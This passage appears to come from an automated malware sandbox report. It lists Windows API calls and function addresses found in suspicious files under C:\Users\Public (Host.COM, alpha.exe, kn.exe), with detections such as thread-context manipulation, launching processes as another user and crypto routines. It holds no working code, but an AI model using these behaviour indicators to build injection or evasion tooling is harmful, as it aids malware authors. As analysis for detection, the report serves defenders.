Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0DBAC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_02E0DBAC
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0DC88 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	9_2_02E0DC88
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0DC00 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_02E0DC00
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E08D6A GetThreadContext,SetThreadContext,NtResumeThread,	9_2_02E08D6A
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E08D6C GetThreadContext,SetThreadContext,NtResumeThread,	9_2_02E08D6C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	10_2_00007FF793758114
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	10_2_00007FF793757FF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	10_2_00007FF7937588C0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	10_2_00007FF79376BCF0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,	10_2_00007FF7937589E4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	10_2_00007FF793771538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79375898C NtQueryInformationToken,	10_2_00007FF79375898C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	10_2_00007FF793743D94
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	11_2_00007FF793758114
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	11_2_00007FF793757FF8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	11_2_00007FF7937588C0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	11_2_00007FF79376BCF0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,	11_2_00007FF7937589E4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	11_2_00007FF793771538
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79375898C NtQueryInformationToken,	11_2_00007FF79375898C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	11_2_00007FF793743D94

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.exe

3_2_00007FF793745240

Contains functionality to launch a process as a different user

Source: C:\Users\Public\alpha.exe

3_2_00007FF793754224

Detected potential crypto function

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937537D8	3_2_00007FF7937537D8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793754224	3_2_00007FF793754224
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79374AA54	3_2_00007FF79374AA54
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793750A6C	3_2_00007FF793750A6C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793755554	3_2_00007FF793755554
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937518D4	3_2_00007FF7937518D4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79374B0D8	3_2_00007FF79374B0D8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793748510	3_2_00007FF793748510
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793742C48	3_2_00007FF793742C48
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79376AC4C	3_2_00007FF79376AC4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793757854	3_2_00007FF793757854
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793741884	3_2_00007FF793741884
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79376AFBC	3_2_00007FF79376AFBC
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793746BE0	3_2_00007FF793746BE0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793743410	3_2_00007FF793743410
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79374372C	3_2_00007FF79374372C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793749B50	3_2_00007FF793749B50
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793745B70	3_2_00007FF793745B70
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793743F90	3_2_00007FF793743F90
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793746EE4	3_2_00007FF793746EE4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793767F00	3_2_00007FF793767F00
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793742220	3_2_00007FF793742220
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793744A30	3_2_00007FF793744A30
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79376AA30	3_2_00007FF79376AA30
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793745240	3_2_00007FF793745240
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793747650	3_2_00007FF793747650
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79374D250	3_2_00007FF79374D250
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793749E50	3_2_00007FF793749E50
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79374E680	3_2_00007FF79374E680
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79376EE88	3_2_00007FF79376EE88
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937481D4	3_2_00007FF7937481D4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79376D9D0	3_2_00007FF79376D9D0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793748DF8	3_2_00007FF793748DF8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79374CE10	3_2_00007FF79374CE10
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793747D30	3_2_00007FF793747D30
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793771538	3_2_00007FF793771538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937537D8	5_2_00007FF7937537D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793754224	5_2_00007FF793754224
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79374AA54	5_2_00007FF79374AA54
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793750A6C	5_2_00007FF793750A6C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793755554	5_2_00007FF793755554
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937518D4	5_2_00007FF7937518D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79374B0D8	5_2_00007FF79374B0D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793748510	5_2_00007FF793748510
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793742C48	5_2_00007FF793742C48
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79376AC4C	5_2_00007FF79376AC4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793757854	5_2_00007FF793757854
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793741884	5_2_00007FF793741884
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79376AFBC	5_2_00007FF79376AFBC
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793746BE0	5_2_00007FF793746BE0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793743410	5_2_00007FF793743410
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79374372C	5_2_00007FF79374372C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793749B50	5_2_00007FF793749B50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793745B70	5_2_00007FF793745B70
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793743F90	5_2_00007FF793743F90
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793746EE4	5_2_00007FF793746EE4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793767F00	5_2_00007FF793767F00
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793742220	5_2_00007FF793742220
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793744A30	5_2_00007FF793744A30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79376AA30	5_2_00007FF79376AA30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793745240	5_2_00007FF793745240
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793747650	5_2_00007FF793747650
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79374D250	5_2_00007FF79374D250
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793749E50	5_2_00007FF793749E50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79374E680	5_2_00007FF79374E680
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79376EE88	5_2_00007FF79376EE88
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937481D4	5_2_00007FF7937481D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79376D9D0	5_2_00007FF79376D9D0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793748DF8	5_2_00007FF793748DF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79374CE10	5_2_00007FF79374CE10
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793747D30	5_2_00007FF793747D30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793771538	5_2_00007FF793771538
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087C120	6_2_00007FF7E087C120
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087CCB8	6_2_00007FF7E087CCB8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A2F38	6_2_00007FF7E07A2F38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087F020	6_2_00007FF7E087F020
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08A3800	6_2_00007FF7E08A3800
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087BC10	6_2_00007FF7E087BC10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EC1D0	6_2_00007FF7E07EC1D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081A1E8	6_2_00007FF7E081A1E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08A41F8	6_2_00007FF7E08A41F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B0140	6_2_00007FF7E07B0140
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0798170	6_2_00007FF7E0798170
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EE29C	6_2_00007FF7E07EE29C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085821C	6_2_00007FF7E085821C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0874274	6_2_00007FF7E0874274
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0806280	6_2_00007FF7E0806280
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B227C	6_2_00007FF7E07B227C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07DE3A0	6_2_00007FF7E07DE3A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F0398	6_2_00007FF7E07F0398
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08243D0	6_2_00007FF7E08243D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0818414	6_2_00007FF7E0818414
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B4410	6_2_00007FF7E07B4410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087234C	6_2_00007FF7E087234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0826374	6_2_00007FF7E0826374
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D64A8	6_2_00007FF7E07D64A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08024D4	6_2_00007FF7E08024D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A44E0	6_2_00007FF7E07A44E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081E4F0	6_2_00007FF7E081E4F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08784D8	6_2_00007FF7E08784D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08A842F	6_2_00007FF7E08A842F
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E079A424	6_2_00007FF7E079A424
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087E430	6_2_00007FF7E087E430
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080A450	6_2_00007FF7E080A450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080C450	6_2_00007FF7E080C450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0828488	6_2_00007FF7E0828488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E8484	6_2_00007FF7E07E8484
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0870490	6_2_00007FF7E0870490
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08885A8	6_2_00007FF7E08885A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A05E0	6_2_00007FF7E07A05E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08985EC	6_2_00007FF7E08985EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E079C520	6_2_00007FF7E079C520
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0864538	6_2_00007FF7E0864538
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F655C	6_2_00007FF7E07F655C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C8570	6_2_00007FF7E07C8570
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E2580	6_2_00007FF7E07E2580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082E57C	6_2_00007FF7E082E57C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FC6D0	6_2_00007FF7E07FC6D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080C6F8	6_2_00007FF7E080C6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085C630	6_2_00007FF7E085C630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F8630	6_2_00007FF7E07F8630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08127D0	6_2_00007FF7E08127D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08407D0	6_2_00007FF7E08407D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081C7F0	6_2_00007FF7E081C7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0886750	6_2_00007FF7E0886750
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08708C8	6_2_00007FF7E08708C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08748C4	6_2_00007FF7E08748C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0882854	6_2_00007FF7E0882854
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081E844	6_2_00007FF7E081E844
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086A9F0	6_2_00007FF7E086A9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FE9F0	6_2_00007FF7E07FE9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F09EC	6_2_00007FF7E07F09EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081AA00	6_2_00007FF7E081AA00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0792940	6_2_00007FF7E0792940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F6984	6_2_00007FF7E07F6984
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E8990	6_2_00007FF7E07E8990
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0864A40	6_2_00007FF7E0864A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087AA58	6_2_00007FF7E087AA58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0884A58	6_2_00007FF7E0884A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081EA7C	6_2_00007FF7E081EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0816A84	6_2_00007FF7E0816A84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0808BD4	6_2_00007FF7E0808BD4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07DCBFC	6_2_00007FF7E07DCBFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E079AC08	6_2_00007FF7E079AC08
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E4B30	6_2_00007FF7E07E4B30
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B4B68	6_2_00007FF7E07B4B68
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0846B94	6_2_00007FF7E0846B94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082CCA8	6_2_00007FF7E082CCA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0888CF4	6_2_00007FF7E0888CF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A8D00	6_2_00007FF7E07A8D00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0822CF8	6_2_00007FF7E0822CF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07ECD10	6_2_00007FF7E07ECD10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E0C28	6_2_00007FF7E07E0C28
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0868C58	6_2_00007FF7E0868C58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E089CC8C	6_2_00007FF7E089CC8C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080CC80	6_2_00007FF7E080CC80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BEDA4	6_2_00007FF7E07BEDA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F2D18	6_2_00007FF7E07F2D18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E8D2C	6_2_00007FF7E07E8D2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0872D6C	6_2_00007FF7E0872D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0806D7C	6_2_00007FF7E0806D7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0878EAC	6_2_00007FF7E0878EAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CEED4	6_2_00007FF7E07CEED4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0796EF4	6_2_00007FF7E0796EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0874E58	6_2_00007FF7E0874E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B8F1C	6_2_00007FF7E07B8F1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0834F94	6_2_00007FF7E0834F94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C4F90	6_2_00007FF7E07C4F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07AB09C	6_2_00007FF7E07AB09C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0791030	6_2_00007FF7E0791030
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D107C	6_2_00007FF7E07D107C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07ED094	6_2_00007FF7E07ED094
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07AD1B8	6_2_00007FF7E07AD1B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E11C8	6_2_00007FF7E07E11C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E31E0	6_2_00007FF7E07E31E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085511C	6_2_00007FF7E085511C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081F168	6_2_00007FF7E081F168
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086D2B4	6_2_00007FF7E086D2B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E079F2C0	6_2_00007FF7E079F2C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F92C4	6_2_00007FF7E07F92C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07ED2C0	6_2_00007FF7E07ED2C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08092D8	6_2_00007FF7E08092D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0845290	6_2_00007FF7E0845290
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087B3AC	6_2_00007FF7E087B3AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08933D4	6_2_00007FF7E08933D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08833D0	6_2_00007FF7E08833D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07973F8	6_2_00007FF7E07973F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080D410	6_2_00007FF7E080D410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0825318	6_2_00007FF7E0825318
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C7340	6_2_00007FF7E07C7340
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BB36C	6_2_00007FF7E07BB36C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B54A0	6_2_00007FF7E07B54A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08894A8	6_2_00007FF7E08894A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08614F0	6_2_00007FF7E08614F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07DF434	6_2_00007FF7E07DF434
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07DD440	6_2_00007FF7E07DD440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0795438	6_2_00007FF7E0795438
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083D460	6_2_00007FF7E083D460
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0849494	6_2_00007FF7E0849494
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F7478	6_2_00007FF7E07F7478
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F55F0	6_2_00007FF7E07F55F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E079F610	6_2_00007FF7E079F610
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08195FC	6_2_00007FF7E08195FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080F520	6_2_00007FF7E080F520
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C156C	6_2_00007FF7E07C156C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CB58C	6_2_00007FF7E07CB58C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0869580	6_2_00007FF7E0869580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E76B0	6_2_00007FF7E07E76B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E084D6A0	6_2_00007FF7E084D6A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081F6D8	6_2_00007FF7E081F6D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086D6DC	6_2_00007FF7E086D6DC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0873638	6_2_00007FF7E0873638
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D5648	6_2_00007FF7E07D5648
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BD660	6_2_00007FF7E07BD660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0865660	6_2_00007FF7E0865660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0847678	6_2_00007FF7E0847678
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0877678	6_2_00007FF7E0877678
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D17D4	6_2_00007FF7E07D17D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08077C8	6_2_00007FF7E08077C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FD7F0	6_2_00007FF7E07FD7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07AF800	6_2_00007FF7E07AF800
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0813760	6_2_00007FF7E0813760
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E9790	6_2_00007FF7E07E9790
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07AB788	6_2_00007FF7E07AB788
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E58CC	6_2_00007FF7E07E58CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B1830	6_2_00007FF7E07B1830
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0843820	6_2_00007FF7E0843820
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082184C	6_2_00007FF7E082184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0863874	6_2_00007FF7E0863874
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082D858	6_2_00007FF7E082D858
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F7890	6_2_00007FF7E07F7890
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08119AC	6_2_00007FF7E08119AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BF9B8	6_2_00007FF7E07BF9B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0791A10	6_2_00007FF7E0791A10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E088994C	6_2_00007FF7E088994C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0887938	6_2_00007FF7E0887938
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081F990	6_2_00007FF7E081F990
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A7AB4	6_2_00007FF7E07A7AB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F7AC8	6_2_00007FF7E07F7AC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080BA48	6_2_00007FF7E080BA48
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C3A40	6_2_00007FF7E07C3A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E1A60	6_2_00007FF7E07E1A60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0849A58	6_2_00007FF7E0849A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0795BA4	6_2_00007FF7E0795BA4
